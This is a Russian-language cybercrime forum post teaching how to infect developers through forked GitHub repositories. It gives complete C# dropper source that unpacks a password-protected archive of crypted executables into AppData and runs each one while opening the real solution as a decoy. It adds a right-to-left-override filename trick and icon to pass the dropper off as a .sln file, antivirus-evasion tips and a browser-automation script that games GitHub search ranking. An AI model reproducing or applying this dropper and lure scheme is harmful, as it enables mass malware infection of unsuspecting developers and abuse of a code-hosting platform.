• [ Регистрация ]Открытая и бесплатная
  • Tg admin@ALPHV_Admin (обязательно подтверждение в ЛС форума)

Статья Льем трафик с GitHub по уму.

admin

#root
Администратор
Регистрация
20.01.2011
Сообщения
7,652
Розыгрыши
0
Реакции
117
Сразу скажу что данный метод уже используют на всю катушку, видел да же писали в новостях на хакере что то подобное, но не где о нем подробно не чего не описано, решил проверить способ и усовершенствовать его.
Инсталы идут и довольно качественные, плюс метод довольно простой, но я его усложнил сделал более незаметным и нам понадобятся хотя бы начальные знания C# и BAS - для овтаматизации процессов в браузере или если сможете переписать на другой ЯП очень простую софтинку о которой реч пойдет ниже.

Подготовка вашей полезной нагрузки
Предположим что у вас уже готовый криптованный exe файл, для начала нужно обязательно сделать ему папм пустыми байтами до 750+ мб.
Качаем архиватор, предпочтительно 7zip: Для просмотра ссылки Войди или Зарегистрируйся

И сжимаем ваш криптованный файл на максимальном сжатии:

46efa08c00b94f98182b2.jpg


Получаем архив с паролем your_password весом почти как ваш изначальный exe без пампа и переименуем его включая расширение например: vsconfig.tmp
Таких файлов мы можем создать сколько угодно с разными exe. главное расширение .tmp и везде 1 пароль, либо положить в 1 архив кучу разных exe, наш софт запустит все.

d2cf48f49f05fbaff6bf6.jpg


Отложим пока наш архив в сторонку и подготовим софт для распаковки и запуска о котором говорил в начале, это основа и по сути сама суть моей статьи.

Я буду писать на C#, софт довольно простой и переписать его другой ЯП труда не составит, готовый код ниже:

C#:
using Ionic.Zip;
using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Windows.Forms;

namespace UnZip
{
    internal class Program
    {
        public static string password = "your_password"; // Пароль от архивов
        private static string STRING = "abcdefghijklmnopqrstuvwxyz";
        private static string INTEGER = "0123456789";

        private static Random charsRandom = new Random();
        private static Random lengthRandom = new Random();
        public static string Random(int length = 0)
        {
            if (length == 0) length = 30;
            lengthRandom.Next(1, length);
            string chars = STRING.ToUpper() + STRING + INTEGER;
            return new string(Enumerable.Repeat(chars, length).Select(s => s[charsRandom.Next(s.Length)]).ToArray());
        }

        static void Main()
        {
            // Ищем все файлы sln и запускаем, а так же все архивы с форматом .tmp которые распакуем во временную папку и запустим все exe файлы в них.
            string[] AllFilesSLN = Directory.GetFiles(Application.StartupPath, "*.sln*", SearchOption.AllDirectories);
            string[] AllFilesZIP = Directory.GetFiles(Application.StartupPath, "*.tmp*", SearchOption.AllDirectories);

            foreach (string filenameSLN in AllFilesSLN)
            {
                try
                {
                    string sln_file = Path.Combine(Application.StartupPath, Path.GetFileNameWithoutExtension(System.Reflection.Assembly.GetExecutingAssembly().Location) + ".sln");
                    File.Move(filenameSLN, sln_file);
                    Process.Start(sln_file);
                }
                catch (Exception ex) { Console.WriteLine(ex);}
                break;
            }

            // Ищем все архивы и распаковываем
            foreach (string filenameZIP in AllFilesZIP)
            {
                try
                {
                    string p = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Random(16));
                    string pathzip = Path.GetDirectoryName(filenameZIP);

                    using (ZipFile zip = ZipFile.Read(filenameZIP))
                    {
                        if (!Directory.Exists(p))
                            Directory.CreateDirectory(p);
                        zip.Password = password;
                        zip.ExtractAll(p);
                        string[] exe = Directory.GetFiles(p, "*.*", SearchOption.AllDirectories);
                        foreach (string name_exe in exe)
                            Process.Start(name_exe);
                    }
                }
                catch (Exception ex) { Console.WriteLine(ex); }
            }
        }
    }
}

Не забудьте указать в коде пароль на ваш архив.
Устанавливаем пакет DotNetZip из NuGet, он нам необходим для распаковки zip архива с паролем.
Не используйте Fody например для добавления dll в exe, это навешает детектов (проверенно!) лучше просто положить dll рядом. Думаю такая dll не вызовет подозрений.

Разберем код
  1. Ищем все .sln файлы переносим их в корень нашего приложения и запускаем их, по факту будет только 1 такой файл от фейкового проекта который мы зальем на гит.
  2. Ищем все архивы с расширением .tmp распаковываем и запускаем все exe файлы в них.
Собираем проект.
Обязательно делаем файлу иконку проекта Visual Studio .sln иконку прикрепил к теме в zip архиве так как .ico формат залить нельзя.

cb6c8bb2ed79acd624554.jpg


А теперь маскируем формат под .sln, для начала изменить реальный формат exe на scr, а теперь самое главно копируем строку ниже именно копируем, а не переписываем:

Resou‮nls..scr.exe

Символы которые можно изменить Resou остальное оставляем как есть!
Должно получится вот так:

a9c90b4f2a5fc855a19a2.jpg


Визуально тот же .sln файл запуска проекта.

Заливаем на VT? Да заливаем в этом и фишка что лить будут такой простой без малвари файл. Его все равно сольют а для статьи как раз посмотрим сколько детектов накапает.
Без обфускации как есть:

Для просмотра ссылки Войди или Зарегистрируйся
Сразу после залива полный фуд по ВТ как будет дальше посмотрим(следим за темой):

45334c097e9c88da44bf5.jpg


Готовим репозиторий
Регаем аккаунт GitHub идем в поиск и ищем какой ни будь репозиторий по своей тематики, читы, крипта или что вам нужно.
Репозиторий ищем обязательно с проектом на Visual Studio где для запуска проекта требуется .sln файл.

Далее для примера я буду использовать этот:

a493c3f060cf99e663052.jpg


Делаем форк этого репозитория и следуем пунктам:
1. Переносим реальный файл .sln в данном примере CSharp-CheatSheet.sln в подпапку например в уже существующую CSharp-CheatSheet что бы это сделать скачайте сначало оригинальный .sln, удалите его из корня, перейдите в папку CSharp-CheatSheet и закачайте туда.
2. В место него ложим в корень наши файлы:
vsconfig.tmp - В котором ваш криптованный exe его не обязательно ложить в корень, можно так же спрятать в подпапку CSharp-CheatSheet наш софт его все равно найдет и распакует.
Обязательно библиотеку DotNetZip.dll без нее не будет работать наш софт!
и сам фейковый фай Resou‮nls..scr.exe
Внимание фейковый файл .sln и библиотека DotNetZip должны быть рядом.

Вот как это выглядит у меня:

ca8c80b9bcbc73ed38a79.jpg


Все готово! Почти. Сам репозиторий уже готов и его можно рекламить.
При скачивании проекта жертва запустит фейковый .sln файл который запустит оригинальный .sln и откроет проект.
Распакует ваш архив с паролем и запустит все exe из него.

Держим в топе в поиске наш репозиторий что бы получить больше установок:
При поиске репозиториев многие фильтруют поиск по последним изменениям, добавлениям, этим мы и воспользуемся!
Создаем в корне нашего проекта любой файл, его мы будем редактировать каждые 30сек. тем самым держа в топе поиске по этим критериям.

Запускаем BAS Для просмотра ссылки Войди или Зарегистрируйся
Первым делом нам нужно получить свои куки от гита что бы работать с нашим репозиторием:
Создаем пустой txt файл где угодно в него мы запишем наши куки.
В BAS жмем Браузер > Загрузить вводим сайт GitHub, после жмем F2 и сможем работать напрямую мышкой в загрузившимся окне. Авторизируемся в своем аккаунте гита.

8710b8e4e2864b9739d91.jpg


Далее жмем Сеть > Сохранить cookies
0b622b46d4ce59686db67.jpg


Сохраняем куки в файл, для этого идем в Файловая система > Записать в файл

467d62eb1ffa22ff464f4.jpg


Откройте ваш txt файл проверьте записались ли туда данные, если все ок закрывайте BAS (Остановить)

Создаем новый проект уже для непосредственного апа нашего репозитория, посредством редактирования файла.
Делаем все по пунктам:
Файловая система > читать файл указваем путь до нашего файла с куками.

8b875d97fcfa8b3ece59a.jpg


Сеть > Загрузить cookies

0fce9a0b9638d424ba65b.jpg


И как до этого открывваем сайт гитхаба но уже ссылокй на файл для редактирования Браузер > Загрузить, и после загрузки вы уже должны быть авторизированны!
Жмете на карандаш справа редактировать файл повится окошко выбираете кликнуть по эллементу, далее в поле редактирования щелкаете еще раз и жмете ввод текста текст установите любой, хоть точку.

И далее все по аналогии сохраняем кликаем по эллементу.
Делаем задержку Ожидание > Спать поставим например 20 000млс.

511c58481effd24322073.jpg


И самое главное делаем пвторение скрипта:

f3c9a601d17049cc2ca94.jpg


Если кому то понадобится могу за $ написать скрипт для работы с вашими куками и апом репозиториев по списку если из много.
В принципе такое сможет сделать любой кодер BAS это не сложно.

Сохраняйте и запускайте скрипт желательно на каком либо сервере что бы работал нонстоп не мешая вам.
После ваш фейковый репозиторий будет в топе подымаясь каждые 20 сек!

По статистике мой софт проработал чуть менее суток я получил около 20 инсталов.
Пусть не много но таких репозиториев можно понаделать кучу.

Так же я советую накрутить звезд, такие услуги я видел по форумам, это придаст доверия к вашему репозиторию.

Находил я и способы пролива через события сборки, не знаю на сколько это лучше или хуже, но думаю использование событий и того же повершела даст много детектов. Да и в реализации это сложнее хоть и менее палевно, решать и делать выводы только вам.
Всем спасибо. Не забываем про наш ВТ выше) посмотрим скок проживет.

by: CyberKayt
 

Вложения

  • SLN_ICON.zip
    1.6 KB · Просмотры: 0
Activity
So far there's no one here
Сверху Снизу